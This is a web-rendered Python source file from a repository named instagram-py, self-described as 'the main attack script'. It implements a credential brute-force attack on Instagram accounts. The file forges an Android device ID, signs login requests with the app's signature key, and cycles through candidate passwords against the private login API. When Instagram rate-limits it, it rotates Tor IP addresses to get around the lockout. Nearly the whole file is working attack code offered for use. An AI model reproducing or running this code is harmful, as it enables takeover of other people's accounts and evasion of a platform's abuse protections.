Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
deathsec
GitHub Repository: deathsec/instagram-py
 Path: blob/master/InstagramPy/InstagramPyInstance.py
197 views
1
# The MIT License.

2
# Copyright (C) 2017 The Future Shell , DeathSec.

3
#

4
# @filename    : InstagramPyInstance.py

5
# @description : creates a new app instance and coordinates with

6
#                InstagramPySession , InstagramPyReports and InstagramPyCLI.

7
#                the main attack script.

8
import uuid

9
import time

10
import sys

11
import hmac

12
import urllib

13
import json

14
import hashlib

15
import requests

16


17


18
class InstagramPyInstance:

19
    cli = None

20
    guid = str(uuid.uuid4())

21
    phone_id = guid

22
    device_id = None

23
    session = None

24
    password_found = False

25


26
    def __init__(self, cli, session):

27
        if not cli == None:

28
            self.cli = cli

29
        else:

30
            self.cli = None

31


32
        if not session == None:

33
            self.session = session

34
        else:

35
            print('InstagramPyInstance:: no session given.')

36
            sys.exit(-1)

37
        self.device_id = self.GetDeviceId()

38


39
    def GetDeviceId(self):

40
        user_hash = hashlib.md5()

41
        user_hash.update(self.session.username.encode(

42
            'utf-8') + str(uuid.uuid4()).encode('utf-8'))

43
        device_hash = hashlib.md5()

44
        device_hash.update(user_hash.hexdigest().encode(

45
            'utf-8') + '12345'.encode('utf-8'))

46
        return str('android-' + device_hash.hexdigest()[:16])

47


48
    def PasswordFound(self):

49
        return self.password_found

50


51
    def TryPassword(self):

52
        if not self.password_found and not self.session.eopl:

53
            request_data = None

54
            response_data = None

55


56
            data = {

57
                'phone_id': self.phone_id,

58
                '_csrftoken': self.session.magic_cookie,

59
                'username': self.session.username,

60
                'guid': self.guid,

61
                'device_id': self.device_id,

62
                'password': self.session.CurrentPassword(),

63
                'login_attempt_count': '0'

64
            }

65


66
            json_data = json.dumps(data)

67
            hmac_signed = hmac.new(self.session.ig_sig_key.encode(

68
                'utf-8'), json_data.encode('utf-8'), hashlib.sha256).hexdigest()

69
            json_data_enc = urllib.parse.quote(json_data)

70


71
            try:

72
                r = requests.Request(method='POST', url='{}accounts/login/'.format(self.session.api_url),

73
                                     data='ig_sig_key_version={}&signed_body={}.{}'.format(self.session.ig_sig_version,

74
                                                                                           hmac_signed,

75
                                                                                           json_data_enc

76
                                                                                           ), cookies=self.session.bot.cookies, headers=self.session.bot.headers)

77
                request_data = r.prepare()

78
                r = self.session.bot.post('{}accounts/login/'.format(self.session.api_url),

79
                                          data='ig_sig_key_version={}&signed_body={}.{}'.format(self.session.ig_sig_version,

80
                                                                                                hmac_signed,

81
                                                                                                json_data_enc

82
                                                                                                ))

83


84
            except KeyboardInterrupt:

85
                if not self.cli == None:

86
                    self.cli.ReportError('process aborted by the user')

87
                else:

88
                    sys.exit(-1)

89
            except (BaseException, Exception) as err:

90
                if not self.cli == None:

91
                    self.cli.ReportError(

92
                        "unable to send request to instagram :: {}".format(err))

93
                else:

94
                    sys.exit(-1)

95


96
            if r.status_code == 200:

97
                self.password_found = True

98
                if not self.cli == None:

99
                    self.cli.PrintProgress(password=self.session.CurrentPassword(),

100
                                           ip=self.session.ip,

101
                                           request=request_data,

102
                                           response=r.content

103
                                           )

104
                    self.cli.ReportAttack(self.session.CurrentPassword())

105
            else:

106
                try:

107
                    response_data = (r.json())['message']

108
                except:

109
                    # sleep for some seconds to let instagram recover

110
                    time.sleep(3)

111
                    return True

112


113
                if response_data == 'challenge_required':

114
                    self.password_found = True

115
                    if not self.cli == None:

116
                        self.cli.PrintProgress(password=self.session.CurrentPassword(),

117
                                               ip=self.session.ip,

118
                                               request=request_data,

119
                                               response=r.content

120
                                               )

121


122
                        self.cli.ReportAttack(self.session.CurrentPassword())

123


124
                elif response_data == 'The password you entered is incorrect. Please try again.':

125
                    if not self.session.current_save == None:

126
                        self.session.UpdateSaveFile()

127
                    self.session.NextPassword()

128
                    if not self.cli == None:

129
                        self.cli.PrintProgress(password=self.session.CurrentPassword(),

130
                                               ip=self.session.ip,

131
                                               request=request_data,

132
                                               response=r.content

133
                                               )

134
                else:

135
                    if 'Invalid' not in response_data:

136
                        if not self.cli == None:

137
                            self.cli.PrintProgress(password=self.session.CurrentPassword(),

138
                                                   ip=self.session.ip,

139
                                                   request=request_data,

140
                                                   response=r.content

141
                                                   )

142
                            self.cli.PrintChangingIP()

143
                        self.session.ChangeIPAddress()  # signal tor to change ip

144
                    else:

145
                        self.session.NextPassword()

146


147
        else:

148
            if self.password_found:

149
                if not self.cli == None:

150
                    self.cli.PrintProgress(password=self.session.CurrentPassword(),

151
                                           ip=self.session.ip,

152
                                           request=request_data,

153
                                           response=r.content

154
                                           )

155


156
                    self.cli.ReportAttack(self.session.CurrentPassword())

157
            else:

158
                if not self.cli == None:

159
                    self.cli.ReportAttack(None)

160
                    sys.exit(-1)

161


162